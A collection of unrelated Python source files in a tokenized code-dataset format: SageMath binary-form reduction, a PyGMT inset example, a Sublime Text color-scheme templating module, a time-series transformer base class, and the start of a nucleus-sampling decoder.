<block_start>cd=cosh(delta).n(prec=prec)<line_sep>sd=sinh(delta).n(prec=prec)<line_sep><return>prod([cd+(cost<times>phi[0]+sint<times>phi[1])<times>sd<for>phi phis])<block_end><def_stmt>epsF delta<block_start>pol=RQ(delta)# get R quotient in terms of z S=PolynomialRing(C 'v')<line_sep>g=S([(i-d)<times>pol[i-d]<for>i range(2<times>d+1)])# take derivative drts=[e<for>e g.roots(ring=C multiplicities=<false>)<if>(e.norm()-1).abs()<l>0.1]<line_sep># find min <return>min([pol(r/r.abs()).real()<for>r drts])<block_end>C=ComplexField(prec=prec)<line_sep>R=F.parent()<line_sep>d=F.degree()<if_stmt>z<is><none><block_start>z,th=covariant_z0(F prec=prec emb=emb)<block_end><else_stmt># need to do our own input checking <block_start><if_stmt>R.ngens()<ne>2<or>any(sum(t)<ne>d<for>t F.exponents())<block_start><raise>TypeError('must be a binary form')<block_end><if_stmt>d<l>3<block_start><raise>ValueError('must be at least degree 3')<block_end><block_end>f=F.subs({R.gen(1):1}).univariate_polynomial()<line_sep># now we have a single variable polynomial <if_stmt>(max(ex<for>p,ex f.roots(ring=C))<ge>QQ(d)/2<or>f.degree()<l>QQ(d)/2)<block_start><raise>ValueError('cannot have root with multiplicity >= deg(F)/2')<block_end>R=RealField(prec=prec)<line_sep>PR=PolynomialRing(R 't')<line_sep>t=PR.gen(0)<line_sep># compute phi_1, ..., phi_k # first find F_0 and its roots # this change of variables on f moves z(f) to j, i.e. produces F_0 rts=f(z.imag()<times>t+z.real()).roots(ring=C)<line_sep>phis=[]# stereographic projection of roots <for_stmt>r,e rts<block_start>phis.extend([[2<times>r.real()/(r.norm()+1) (r.norm()-1)/(r.norm()+1)]])<block_end><if_stmt>d<ne>f.degree()# include roots at infinity <block_start>phis.extend([(d-f.degree())<times>[0 1]])<block_end># for writing RQ in terms of generic z to minimize LC=LaurentSeriesRing(C 'u' default_prec=2<times>d+2)<line_sep>u=LC.gen(0)<line_sep>cost=(u+u<power>(-1))/2<line_sep>sint=(u-u<power>(-1))/(2<times>C.gen(0))<line_sep># first find an interval containing the desired value # then use regula falsi on log eps_F # d -> delta value in interval [0,1] # v in value in interval [1,epsF(1)] dl=R(0.0)<line_sep>vl=R(1.0)<line_sep>du=R(1.0)<line_sep>vu=epsF(du)<while_stmt>vu<l>target# compute the next value of epsF for delta = 2*delta <block_start>dl=du<line_sep>vl=vu<line_sep>du<augmul>2<line_sep>vu=epsF(du)<block_end># now dl < delta <= du logt=target.log()<line_sep>l2=(vu.log()-logt).n(prec=prec)<line_sep>l1=(vl.log()-logt).n(prec=prec)<line_sep>dn=(dl<times>l2-du<times>l1)/(l2-l1)<line_sep>vn=epsF(dn)<line_sep>dl=du<line_sep>vl=vu<line_sep>du=dn<line_sep>vu=vn<while_stmt>(du-dl).abs()<ge>target_tol<or>max(vl vu)<l>target<block_start>l2=(vu.log()-logt).n(prec=prec)<line_sep>l1=(vl.log()-logt).n(prec=prec)<line_sep>dn=(dl<times>l2-du<times>l1)/(l2-l1)<line_sep>vn=epsF(dn)<line_sep>dl=du<line_sep>vl=vu<line_sep>du=dn<line_sep>vu=vn<block_end><return>max(dl du)<block_end><def_stmt>get_bound_poly F prec=53 norm_type='norm' emb=<none><block_start>""" The hyperbolic distance from `j` which must contain the smallest poly. This defines the maximum possible distance from `j` to the `z_0` covariant in the hyperbolic 3-space for which the associated `F` could have smaller coefficients. INPUT: - ``F`` -- binary form of degree at least 3 with no multiple roots - ``prec``-- positive integer. 
precision to use in CC - ``norm_type`` -- string, either norm or height - ``emb`` -- embedding into CC OUTPUT: a positive real number EXAMPLES:: sage: from sage.rings.polynomial.binary_form_reduce import get_bound_poly sage: R.<x,y> = QQ[] sage: F = -2*x^3 + 2*x^2*y + 3*x*y^2 + 127*y^3 sage: get_bound_poly(F) # tol 1e-12 28.0049336543295 sage: get_bound_poly(F, norm_type='height') # tol 1e-11 111.890642019092 """<if_stmt>F.base_ring()<ne>ComplexField(prec=prec)<block_start><if_stmt>emb<is><none><block_start>compF=F.change_ring(ComplexField(prec=prec))<block_end><else_stmt><block_start>compF=F.change_ring(emb)<block_end><block_end><else_stmt><block_start>compF=F<block_end>n=F.degree()<assert_stmt>(n<g>2) "degree 2 polynomial"<line_sep>z0F,thetaF=covariant_z0(compF prec=prec emb=emb)<if_stmt>norm_type<eq>'norm'# euclidean norm squared <block_start>normF=(sum([abs(i)<power>2<for>i compF.coefficients()]))<line_sep>target=(2<power>(n-1))<times>normF/thetaF<block_end><elif_stmt>norm_type<eq>'height'<block_start>hF=exp(max([c.global_height(prec=prec)<for>c F.coefficients()]))# height target=(2<power>(n-1))<times>(n+1)<times>(hF<power>2)/thetaF<block_end><else_stmt><block_start><raise>ValueError('type must be norm or height')<block_end><return>cosh(epsinv(F target prec=prec))<block_end><def_stmt>smallest_poly F prec=53 norm_type='norm' emb=<none><block_start>r""" Determine the poly with smallest coefficients in `SL(2,\Z)` orbit of ``F`` Smallest can be in the sense of `L_2` norm or height. The method is the algorithm in Hutz-Stoll [HS2018]_. ``F`` needs to be a binary form with no multiple roots of degree at least 3. It should already be reduced in the sense of Cremona-Stoll [CS2003]_. INPUT: - ``F`` -- binary form of degree at least 3 with no multiple roots - ``norm_type`` -- string - ``norm`` or ``height`` controlling what ``smallest`` means for the coefficients. 
OUTPUT: pair [poly, matrix] EXAMPLES:: sage: from sage.rings.polynomial.binary_form_reduce import smallest_poly sage: R.<x,y> = QQ[] sage: F = -x^8 + 6*x^7*y - 7*x^6*y^2 - 12*x^5*y^3 + 27*x^4*y^4\ ....: - 4*x^3*y^5 - 19*x^2*y^6 + 10*x*y^7 - 5*y^8 sage: smallest_poly(F, prec=100) #long time [ -x^8 - 2*x^7*y + 7*x^6*y^2 + 16*x^5*y^3 + 2*x^4*y^4 - 2*x^3*y^5 + 4*x^2*y^6 - 5*y^8, <BLANKLINE> [1 1] [0 1] ] :: sage: from sage.rings.polynomial.binary_form_reduce import smallest_poly, get_bound_poly sage: R.<x,y> = QQ[] sage: F = -2*x^3 + 2*x^2*y + 3*x*y^2 + 127*y^3 sage: smallest_poly(F) [ [1 4] -2*x^3 - 22*x^2*y - 77*x*y^2 + 43*y^3, [0 1] ] sage: F0, M = smallest_poly(F, norm_type='height') sage: F0, M # random ( [5 4] -58*x^3 - 47*x^2*y + 52*x*y^2 + 43*y^3, [1 1] ) sage: M in SL2Z, F0 == R.hom(M * vector([x, y]))(F) (True, True) sage: get_bound_poly(F0, norm_type='height') # tol 1e-12 23.3402702199809 An example with a multiple root:: sage: R.<x,y> = QQ[] sage: F = -16*x^7 - 114*x^6*y - 345*x^5*y^2 - 599*x^4*y^3 - 666*x^3*y^4\ ....: - 481*x^2*y^5 - 207*x*y^6 - 40*y^7 sage: F.reduced_form() ( [-1 -1] -x^5*y^2 - 24*x^3*y^4 - 3*x^2*y^5 - 2*x*y^6 + 16*y^7, [ 1 0] ) """<def_stmt>insert_item pts item index# binary insertion to maintain list of points left to consider <block_start>N=len(pts)<if_stmt>N<eq>0<block_start><return>[item]<block_end><elif_stmt>N<eq>1<block_start><if_stmt>item[index]<g>pts[0][index]<block_start>pts.insert(0 item)<block_end><else_stmt><block_start>pts.append(item)<block_end><return>pts<block_end><else_stmt># binary insertion <block_start>left=1<line_sep>right=N<line_sep>mid=(left+right)<floordiv>2# these are ints so this is .floor() <if_stmt>item[index]<g>pts[mid][index]# item goes into first half <block_start><return>insert_item(pts[:mid] item index)+pts[mid:N]<block_end><else_stmt># item goes into second half <block_start><return>pts[:mid]+insert_item(pts[mid:N] item index)<block_end><block_end><block_end><def_stmt>coshdelta z# The cosh of the hyperbolic distance from z = t+uj to j <block_start><return>(z.norm()+1)/(2<times>z.imag())# reduce in the sense of Cremona-Stoll <block_end>G=F<line_sep>MG=matrix(ZZ 2 2 [1 0 0 1])<line_sep>x,y=G.parent().gens()<if_stmt>norm_type<eq>'norm'<block_start>current_size=sum([abs(i)<power>2<for>i G.coefficients()])# euclidean norm squared <block_end><elif_stmt>norm_type<eq>'height'# height <block_start>current_size=exp(max([c.global_height(prec=prec)<for>c G.coefficients()]))<block_end><else_stmt><block_start><raise>ValueError('type must be norm or height')<block_end>v0,th=covariant_z0(G prec=prec emb=emb)<line_sep>rep=2<times>CC.gen(0)# representative point in fundamental domain <import_from_stmt>math isnan<if_stmt>isnan(v0.abs())<block_start><raise>ValueError("invalid covariant: %s"%v0)<block_end>R=get_bound_poly(G prec=prec norm_type=norm_type)<line_sep># check orbit S=matrix(ZZ 2 2 [0 -1 1 0])<line_sep>T=matrix(ZZ 2 2 [1 1 0 1])<line_sep>TI=matrix(ZZ 2 2 [1 -1 0 1])<line_sep>count=0<line_sep>pts=[[G v0 rep MG coshdelta(v0) 0]]# label - 0:None, 1:S, 2:T, 3:T^(-1) current_min=[G v0 rep MG coshdelta(v0)]<while_stmt>pts<block_start>G,v,rep,M,D,label=pts.pop()<line_sep># apply ST and keep z, Sz <if_stmt>D<g>R<block_start><break># all remaining pts are too far away <block_end># check if it is smaller. 
If so, we can improve the bound count<augadd>1<if_stmt>norm_type<eq>'norm'<block_start>new_size=sum([abs(i)<power>2<for>i G.coefficients()])# euclidean norm squared <block_end><else_stmt># height <block_start>new_size=exp(max([c.global_height(prec=prec)<for>c G.coefficients()]))<block_end><if_stmt>new_size<l>current_size<block_start>current_min=[G v rep M coshdelta(v)]<line_sep>current_size=new_size<line_sep>R=get_bound_poly(G norm_type=norm_type prec=prec emb=emb)<block_end># add new points to check <if_stmt>label<ne>1<and>min((rep+1).norm() (rep-1).norm())<ge>1# don't undo S # the 2nd condition is equivalent to |\Re(-1/rep)| <= 1/2 # this means that rep can have resulted from an inversion step in # the shift-and-invert procedure, so don't invert # do inversion <block_start>z=-1/v<line_sep>new_pt=[G.subs({x:-y y:x}) z -1/rep M<times>S coshdelta(z) 1]<line_sep>pts=insert_item(pts new_pt 4)<block_end><if_stmt>label<ne>3# don't undo TI # do right shift <block_start>z=v-1<line_sep>new_pt=[G.subs({x:x+y}) z rep-1 M<times>T coshdelta(z) 2]<line_sep>pts=insert_item(pts new_pt 4)<block_end><if_stmt>label<ne>2# don't undo T # do left shift <block_start>z=v+1<line_sep>new_pt=[G.subs({x:x-y}) z rep+1 M<times>TI coshdelta(z) 3]<line_sep>pts=insert_item(pts new_pt 4)<block_end><block_end><return>[current_min[0] current_min[3]]<block_end>
""" Inset ----- The :meth:`pygmt.Figure.inset` method adds an inset figure inside a larger figure. The function is called using a ``with`` statement, and its ``position``, ``box``, ``offset``, and ``margin`` parameters are set. Plotting methods called within the ``with`` statement are applied to the inset figure. """<import_stmt>pygmt<line_sep>fig=pygmt.Figure()<line_sep># Create the primary figure, setting the region to Madagascar, the land color # to "brown", the water to "lightblue", the shorelines width to "thin", and # adding a frame fig.coast(region="MG+r2" land="brown" water="lightblue" shorelines="thin" frame="a")<line_sep># Create an inset, setting the position to top left, the width to 3.5 cm, and # the x- and y-offsets to 0.2 cm. The margin is set to 0, and the border is # "gold" with a pen size of 1.5p. <with_stmt>fig.inset(position="jTL+w3.5c+o0.2c" margin=0 box="+p1.5p,gold")# Create a figure in the inset using coast. This example uses the azimuthal # orthogonal projection centered at 47E, 20S. The land color is set to # "gray" and Madagascar is highlighted in "red3". <block_start>fig.coast(region="g" projection="G47/-20/?" land="gray" water="white" dcw="MG+gred3" )<block_end>fig.show()<line_sep>
""" Sublime Text Scheme template. Converts scheme to css provides templating for additonal so that they can access the colors. Licensed under MIT Copyright (c) 2015 - 2016 <NAME> <<EMAIL>> ---------------------- TextMate theme to CSS. https://manual.macromates.com/en/language_grammars#naming_conventions """<import_stmt>sublime<import_stmt>re<import_from_stmt>. version<as>ver<import_from_stmt>.rgba RGBA<import_from_stmt>.st_color_scheme_matcher ColorSchemeMatcher<import_stmt>jinja2<import_from_stmt>pygments.formatters HtmlFormatter<import_from_stmt>collections OrderedDict<import_from_stmt>.st_clean_css clean_css<import_stmt>copy<import_stmt>decimal<line_sep>NEW_SCHEMES=int(sublime.version())<ge>3150<line_sep>INVALID=-1<line_sep>POPUP=0<line_sep>PHANTOM=1<line_sep>LUM_MIDPOINT=127<line_sep>re_float_trim=re.compile(r'^(?P<keep>\d+)(?P<trash>\.0+|(?P<keep2>\.\d*[1-9])0+)$')<line_sep>re_valid_custom_scopes=re.compile(r'[a-zA-Z\d]+[a-zA-Z\d._\-]*')<line_sep>re_missing_semi_colon=re.compile(r'(?<!;) \}')<line_sep>re_base_colors=re.compile(r'^\s*\.(?:dummy)\s*\{([^}]+)\}' re.MULTILINE)<line_sep>re_color=re.compile(r'(?<!-)(color\s*:\s*#[A-Fa-z\d]{6})')<line_sep>re_bgcolor=re.compile(r'(?<!-)(background(?:-color)?\s*:\s*#[A-Fa-z\d]{6})')<line_sep>re_pygments_selectors=re.compile(r'\.dummy (\.[a-zA-Z\d]+) ')<line_sep>CODE_BLOCKS='.mdpopups .highlight, .mdpopups .inline-highlight { %s; %s; }'<def_stmt>fmt_float f p=0<block_start>"""Set float precision and trim precision zeros."""<line_sep>string=str(decimal.Decimal(f).quantize(decimal.Decimal('0.'+('0'<times>p)<if>p<g>0<else>'0') decimal.ROUND_HALF_UP))<line_sep>m=re_float_trim.match(string)<if_stmt>m<block_start>string=m.group('keep')<if_stmt>m.group('keep2')<block_start>string<augadd>m.group('keep2')<block_end><block_end><return>string<block_end><class_stmt>SchemeTemplate(object)<block_start>"""Determine color scheme colors and style for text in a Sublime view buffer."""<def_stmt>__init__ self scheme_file<block_start>"""Initialize."""<line_sep>self.scheme_file=scheme_file<line_sep>self.css_type=INVALID<line_sep>self.variable={}<line_sep>self.view=<none><line_sep>self.setup()<block_end><def_stmt>guess_style self view scope selected=<false> explicit_background=<false><block_start>"""Guess color."""<line_sep># Remove leading '.' to account for old style CSS class scopes. <if_stmt><not>NEW_SCHEMES<block_start><return>self.csm.guess_color(scope.lstrip('.') selected explicit_background)<block_end><else_stmt><block_start>scope_style=view.style_for_scope(scope.lstrip('.'))<line_sep>style={}<line_sep>style['foreground']=scope_style['foreground']<line_sep>style['background']=scope_style.get('background')<line_sep>style['bold']=scope_style['bold']<line_sep>style['italic']=scope_style['italic']<line_sep>defaults=view.style()<if_stmt><not>explicit_background<and><not>style.get('background')<block_start>style['background']=defaults.get('background' '#FFFFFF')<block_end><if_stmt>selected<block_start>sfg=scope_style.get('selection_forground' defaults.get('selection_forground'))<if_stmt>sfg<block_start>style['foreground']=sfg<block_end>style['background']=scope_style.get('selection' '#0000FF')<block_end><return>style<block_end><block_end><def_stmt>legacy_parse_global self<block_start>""" Parse global settings. LEGACY. 
"""<line_sep>self.csm=ColorSchemeMatcher(self.scheme_file)<line_sep># Get general theme colors from color scheme file self.bground=self.csm.special_colors['background']['color_simulated']<line_sep>rgba=RGBA(self.bground)<line_sep>self.lums=rgba.get_true_luminance()<line_sep>is_dark=self.lums<le>LUM_MIDPOINT<line_sep>self._variables={"is_dark":is_dark "is_light":<not>is_dark "sublime_version":int(sublime.version()) "mdpopups_version":ver.version() "color_scheme":self.scheme_file "use_pygments":self.use_pygments "default_style":self.default_style}<line_sep>self.html_border=rgba.get_rgb()<line_sep>self.fground=self.csm.special_colors['foreground']['color_simulated']<block_end><def_stmt>get_variables self<block_start>"""Get variables."""<if_stmt>NEW_SCHEMES<block_start>is_dark=self.is_dark()<line_sep><return>{"is_dark":is_dark "is_light":<not>is_dark "sublime_version":int(sublime.version()) "mdpopups_version":ver.version() "color_scheme":self.scheme_file "use_pygments":self.use_pygments "default_style":self.default_style}<block_end><else_stmt><block_start><return>self._variables<block_end><block_end><def_stmt>get_html_border self<block_start>"""Get html border."""<line_sep><return>self.get_bg()<if>NEW_SCHEMES<else>self.html_border<block_end><def_stmt>is_dark self<block_start>"""Check if scheme is dark."""<line_sep><return>self.get_lums()<le>LUM_MIDPOINT<block_end><def_stmt>get_lums self<block_start>"""Get luminance."""<if_stmt>NEW_SCHEMES<block_start>bg=self.get_bg()<line_sep>rgba=RGBA(bg)<line_sep><return>rgba.get_true_luminance()<block_end><else_stmt><block_start><return>self.lums<block_end><block_end><def_stmt>get_fg self<block_start>"""Get foreground."""<line_sep><return>self.view.style().get('foreground' '#000000')<if>NEW_SCHEMES<else>self.fground<block_end><def_stmt>get_bg self<block_start>"""Get backtround."""<line_sep><return>self.view.style().get('background' '#FFFFFF')<if>NEW_SCHEMES<else>self.bground<block_end><def_stmt>setup self<block_start>"""Setup the template environment."""<line_sep>settings=sublime.load_settings("Preferences.sublime-settings")<line_sep>self.use_pygments=<not>settings.get('mdpopups.use_sublime_highlighter' <true>)<line_sep>self.default_style=settings.get('mdpopups.default_style' <true>)<if_stmt><not>NEW_SCHEMES<block_start>self.legacy_parse_global()<block_end># Create Jinja template self.env=jinja2.Environment()<line_sep>self.env.filters['css']=self.retrieve_selector<line_sep>self.env.filters['pygments']=self.pygments<line_sep>self.env.filters['foreground']=self.to_fg<line_sep>self.env.filters['background']=self.to_bg<line_sep>self.env.filters['brightness']=self.brightness<line_sep>self.env.filters['colorize']=self.colorize<line_sep>self.env.filters['hue']=self.hue<line_sep>self.env.filters['invert']=self.invert<line_sep>self.env.filters['saturation']=self.saturation<line_sep>self.env.filters['contrast']=self.contrast<line_sep>self.env.filters['grayscale']=self.grayscale<line_sep>self.env.filters['sepia']=self.sepia<line_sep>self.env.filters['fade']=self.fade<line_sep>self.env.filters['getcss']=self.read_css<block_end><def_stmt>read_css self css<block_start>"""Read the CSS file."""<try_stmt><block_start>var=copy.copy(self.variables)<line_sep>var.update({'is_phantom':self.css_type<eq>PHANTOM 'is_popup':self.css_type<eq>POPUP})<line_sep><return>self.env.from_string(clean_css(sublime.load_resource(css))).render(var=var plugin=self.plugin_vars)<block_end><except_stmt>Exception<block_start><return>''<block_end><block_end><def_stmt>fade self css 
factor<block_start>""" Apply a fake transparency to color. Fake transparency is preformed on top of the background color. """<try_stmt><block_start>parts=[c.strip('; ')<for>c css.split(':')]<if_stmt>len(parts)<eq>2<and>parts[0]<in>('background-color' 'color')<block_start>rgba=RGBA(parts[1]+"%02f"%int(255.0<times>max(min(float(factor) 1.0) 0.0)))<line_sep>rgba.apply_alpha(self.get_bg())<line_sep><return>'%s: %s; '%(parts[0] rgba.get_rgb())<block_end><block_end><except_stmt>Exception<block_start><pass><block_end><return>css<block_end><def_stmt>colorize self css degree<block_start>"""Colorize to the given hue."""<line_sep>parts=[c.strip('; ')<for>c css.split(':')]<if_stmt>len(parts)<eq>2<and>parts[0]<in>('background-color' 'color')<block_start>rgba=RGBA(parts[1])<line_sep>rgba.colorize(degree)<line_sep>parts[1]="%s; "%rgba.get_rgb()<line_sep><return>'%s: %s '%(parts[0] parts[1])<block_end><return>css<block_end><def_stmt>hue self css degree<block_start>"""Shift hue."""<line_sep>parts=[c.strip('; ')<for>c css.split(':')]<if_stmt>len(parts)<eq>2<and>parts[0]<in>('background-color' 'color')<block_start>rgba=RGBA(parts[1])<line_sep>rgba.hue(degree)<line_sep>parts[1]="%s; "%rgba.get_rgb()<line_sep><return>'%s: %s '%(parts[0] parts[1])<block_end><return>css<block_end><def_stmt>invert self css<block_start>"""Invert color."""<line_sep>parts=[c.strip('; ')<for>c css.split(':')]<if_stmt>len(parts)<eq>2<and>parts[0]<in>('background-color' 'color')<block_start>rgba=RGBA(parts[1])<line_sep>rgba.invert()<line_sep>parts[1]="%s; "%rgba.get_rgb()<line_sep><return>'%s: %s '%(parts[0] parts[1])<block_end><return>css<block_end><def_stmt>contrast self css factor<block_start>"""Apply contrast filter."""<line_sep>parts=[c.strip('; ')<for>c css.split(':')]<if_stmt>len(parts)<eq>2<and>parts[0]<in>('background-color' 'color')<block_start>rgba=RGBA(parts[1])<line_sep>rgba.contrast(factor)<line_sep>parts[1]="%s; "%rgba.get_rgb()<line_sep><return>'%s: %s '%(parts[0] parts[1])<block_end><return>css<block_end><def_stmt>saturation self css factor<block_start>"""Apply saturation filter."""<line_sep>parts=[c.strip('; ')<for>c css.split(':')]<if_stmt>len(parts)<eq>2<and>parts[0]<in>('background-color' 'color')<block_start>rgba=RGBA(parts[1])<line_sep>rgba.saturation(factor)<line_sep>parts[1]="%s; "%rgba.get_rgb()<line_sep><return>'%s: %s '%(parts[0] parts[1])<block_end><return>css<block_end><def_stmt>grayscale self css<block_start>"""Apply grayscale filter."""<line_sep>parts=[c.strip('; ')<for>c css.split(':')]<if_stmt>len(parts)<eq>2<and>parts[0]<in>('background-color' 'color')<block_start>rgba=RGBA(parts[1])<line_sep>rgba.grayscale()<line_sep>parts[1]="%s; "%rgba.get_rgb()<line_sep><return>'%s: %s '%(parts[0] parts[1])<block_end><return>css<block_end><def_stmt>sepia self css<block_start>"""Apply sepia filter."""<line_sep>parts=[c.strip('; ')<for>c css.split(':')]<if_stmt>len(parts)<eq>2<and>parts[0]<in>('background-color' 'color')<block_start>rgba=RGBA(parts[1])<line_sep>rgba.sepia()<line_sep>parts[1]="%s; "%rgba.get_rgb()<line_sep><return>'%s: %s '%(parts[0] parts[1])<block_end><return>css<block_end><def_stmt>brightness self css factor<block_start>"""Adjust brightness."""<line_sep>parts=[c.strip('; ')<for>c css.split(':')]<if_stmt>len(parts)<eq>2<and>parts[0]<in>('background-color' 'color')<block_start>rgba=RGBA(parts[1])<line_sep>rgba.brightness(factor)<line_sep>parts[1]="%s; "%rgba.get_rgb()<line_sep><return>'%s: %s '%(parts[0] parts[1])<block_end><return>css<block_end><def_stmt>to_fg self css<block_start>"""Rename a CSS 
key value pair."""<line_sep>parts=[c.strip('; ')<for>c css.split(':')]<if_stmt>len(parts)<eq>2<and>parts[0]<eq>'background-color'<block_start>parts[0]='color'<line_sep><return>'%s: %s; '%(parts[0] parts[1])<block_end><return>css<block_end><def_stmt>to_bg self css<block_start>"""Rename a CSS key value pair."""<line_sep>parts=[c.strip('; ')<for>c css.split(':')]<if_stmt>len(parts)<eq>2<and>parts[0]<eq>'color'<block_start>parts[0]='background-color'<line_sep><return>'%s: %s; '%(parts[0] parts[1])<block_end><return>css<block_end><def_stmt>pygments self style<block_start>"""Get pygments style."""<line_sep><return>get_pygments(style)<block_end><def_stmt>retrieve_selector self selector key=<none> explicit_background=<true><block_start>"""Get the CSS key, value pairs for a rule."""<if_stmt>NEW_SCHEMES<block_start>general=self.view.style()<line_sep>fg=general.get('foreground' '#000000')<line_sep>bg=general.get('background' '#ffffff')<line_sep>scope=self.view.style_for_scope(selector)<line_sep>style=[]<if_stmt>scope['bold']<block_start>style.append('bold')<block_end><if_stmt>scope['italic']<block_start>style.append('italic')<block_end>color=scope.get('foreground' fg)<line_sep>bgcolor=scope.get('background' (<none><if>explicit_background<else>bg))<block_end><else_stmt><block_start>scope=self.guess_style(self.view selector explicit_background=explicit_background)<line_sep>color=scope.fg_simulated<line_sep>bgcolor=scope.bg_simulated<line_sep>style=scope.style.split(' ')<block_end>css=[]<if_stmt>color<and>(key<is><none><or>key<eq>'color')<block_start>css.append('color: %s'%color)<block_end><if_stmt>bgcolor<and>(key<is><none><or>key<eq>'background-color')<block_start>css.append('background-color: %s'%bgcolor)<block_end><for_stmt>s style<block_start><if_stmt>"bold"<in>s<and>(key<is><none><or>key<eq>'font-weight')<block_start>css.append('font-weight: bold')<block_end><if_stmt>"italic"<in>s<and>(key<is><none><or>key<eq>'font-style')<block_start>css.append('font-style: italic')<block_end><if_stmt>"underline"<in>s<and>(key<is><none><or>key<eq>'text-decoration')<and><false># disabled <block_start>css.append('text-decoration: underline')<block_end><block_end>text=';'.join(css)<if_stmt>text<block_start>text<augadd>';'<block_end><return>text<block_end><def_stmt>apply_template self view css css_type template_vars=<none><block_start>"""Apply template to css."""<line_sep>self.view=view<if_stmt>css_type<not><in>(POPUP PHANTOM)<block_start><return>''<block_end>self.css_type=css_type<line_sep>self.variables=self.get_variables()<line_sep>var=copy.copy(self.variables)<if_stmt>template_vars<and>isinstance(template_vars (dict OrderedDict))<block_start>self.plugin_vars=copy.deepcopy(template_vars)<block_end><else_stmt><block_start>self.plugin_vars={}<block_end>var.update({'is_phantom':self.css_type<eq>PHANTOM 'is_popup':self.css_type<eq>POPUP})<line_sep><return>self.env.from_string(css).render(var=var plugin=self.plugin_vars)<block_end><block_end><def_stmt>get_pygments style<block_start>""" Get pygments style. Subllime CSS support is limited. It cannot handle well things like: `.class1 .class2`, but it can handle things like: `.class1.class2`. So we will not use things like `.highlight` in front. We will first find {...} which has no syntax class. This will contain our background and possibly foreground. If for whatever reason we have no background or foreground, we will use `#000000` or `#ffffff` respectively. 
"""<try_stmt># Lets see if we can find the pygments theme <block_start>text=HtmlFormatter(style=style).get_style_defs('.dummy')<line_sep>text=re_missing_semi_colon.sub('; }' text)<block_end><except_stmt>Exception<block_start><return>''<block_end>bg=<none><line_sep>fg=<none><line_sep># Find {...} which has no syntax classes m=re_base_colors.search(text)<if_stmt>m# Find background <block_start>m1=re_bgcolor.search(m.group(1))<if_stmt>m1# Use `background-color` as it works better # with Sublime CSS <block_start>bg=m1.group(1).replace('background' 'background-color')<block_end># Find foreground m1=re_color.search(m.group(1))<if_stmt>m1<block_start>fg=m1.group(1)<block_end><block_end># Use defaults if None found <if_stmt>bg<is><none><block_start>bg='background-color: #ffffff'<block_end><if_stmt>fg<is><none><block_start>fg='color: #000000'<block_end># Reassemble replacing .highlight {...} with .codehilite, .inlinehilite {...} # All other classes will be left bare with only their syntax class. code_blocks=CODE_BLOCKS<if_stmt>m<block_start>css=clean_css((text[:m.start(0)]+(code_blocks%(bg fg))+text[m.end(0):]+'\n'))<block_end><else_stmt><block_start>css=clean_css(((code_blocks%(bg fg))+'\n'+text+'\n'))<block_end><return>re_pygments_selectors.sub(r'.mdpopups .highlight \1' css)<block_end>
# -*- coding: utf-8 -*- <import_stmt>abc<import_from_stmt>..base BaseTransformer<class_stmt>BaseEndogTransformer(BaseTransformer metaclass=abc.ABCMeta)<block_start>"""A base class for endogenous array transformers"""<def_stmt>_check_y_X self y X<block_start>"""Check the endog and exog arrays"""<line_sep>y,X=super(BaseEndogTransformer self)._check_y_X(y X)<if_stmt>y<is><none><block_start><raise>ValueError("y must be non-None for endogenous transformers")<block_end><return>y X<block_end>@abc.abstractmethod<def_stmt>inverse_transform self y X=<none> **kwargs# TODO: remove kwargs <block_start>"""Inverse transform a transformed array Inverse the transformation on the transformed array. Parameters ---------- y : array-like or None, shape=(n_samples,) The transformed endogenous (time-series) array. X : array-like or None, shape=(n_samples, n_features), optional The exogenous array of additional covariates. Not used for endogenous transformers. Default is None, and non-None values will serve as pass-through arrays. Returns ------- y : array-like or None The inverse-transformed y array X : array-like or None The inverse-transformed exogenous array """<block_end><block_end>
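Illustrative sketch only: the contract implied by the base class above is that a concrete endogenous transformer changes ``y`` one way and ``inverse_transform`` undoes it exactly. The class and names below are hypothetical plain Python/NumPy (they do not inherit the library's base classes) and only demonstrate that round-trip expectation.

import numpy as np

class LogEndogSketch:
    """Hypothetical example of the transform / inverse_transform pairing."""

    def transform(self, y, X=None):
        if y is None:
            raise ValueError("y must be non-None for endogenous transformers")
        return np.log(np.asarray(y, dtype=float)), X

    def inverse_transform(self, y, X=None):
        # Undo the forward transform so that round-tripping recovers y.
        return np.exp(np.asarray(y, dtype=float)), X

y = np.array([1.0, 2.0, 4.0])
sketch = LogEndogSketch()
y_t, _ = sketch.transform(y)
y_back, _ = sketch.inverse_transform(y_t)
assert np.allclose(y_back, y)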
r""" Nucleus Sampling was introduced in the paper `The Curious Case of Neural Text Degeneration <https://arxiv.org/abs/1904.09751>`_. If you take it from here, make sure to cite them: .. code-block:: text @inproceedings{, title={The Curious Case of Neural Text Degeneration}, author={<NAME> and <NAME> and <NAME> and <NAME> and <NAME>}, journal={ICLR}, year={2020} } Some core parts of this code are adapted with minor modifications from Thomas Wolf's gist: https://gist.githubusercontent.com/thomwolf/1a5a29f6962089e871b94cbd09daf317 """<import_from_stmt>typing Callable List Tuple<import_stmt>torch<import_stmt>torch.nn.functional<as>F<class_stmt>AutoRegressiveNucleusSampling(object)<block_start>r""" Implements the nucleus sampling for decoding captions. This class only works for auto-regressive models (Transformer-like), not recurrent models (LSTM-like). Args: eos_index: The index of the end token (``[EOS]``) in vocabulary. max_steps: The maximum number of decoding steps. nucleus_size: Size of top-K nucleus for sampling. """<def_stmt>__init__ self eos_index:int max_steps:int=50 nucleus_size:float=0.9 <block_start>super().__init__()<line_sep>self._eos_index=eos_index<line_sep>self.max_steps=max_steps<line_sep>self.nucleus_size=nucleus_size<block_end><def_stmt>search self start_predictions:torch.Tensor step:Callable[<ellipsis> torch.Tensor]<arrow>Tuple[torch.Tensor <none>]<block_start>batch_size=start_predictions.size()[0]<line_sep># List of `(batch_size, )` tensors. One for each timestep. # This includes the start-of-sentence tokens, unlike the implementation # in `AutoregressiveBeamSearch`. We will remove them in the end. predictions:List[torch.Tensor]=[start_predictions]<for_stmt>timestep range(self.max_steps)# Get the predictions from last timestep (most recent). # shape: (batch_size, ) <block_start>last_predictions=predictions[-1]<line_sep># If every predicted token from the last step is end-of-sentence token, # then we can stop early. <if_stmt>(last_predictions<eq>self._eos_index).all()<block_start><break><block_end># Combine step predictions made so far into one tensor. This is our # "partial" caption input to the transformer. # shape: (batch_size, timestep + 1) predictions_so_far=torch.stack(predictions).permute(1 0)<line_sep># Take a step, get the distribution of logits from next timestep. # shape: (batch_size, num_classes) current_logits=step(predictions_so_far)<line_sep># Sort logits in descending order to determine the nucleus. sorted_logits,sorted_idx=torch.sort(current_logits descending=<true>)<line_sep># Get cumulative softmax probabilites. For every instance in batch, a # variable amount of tokens (N) will consitute the nucleus. # shape: (batch_size, num_classes) cumulative_probs=torch.cumsum(F.softmax(sorted_logits dim=-1) dim=-1)<line_sep># Determine indices of 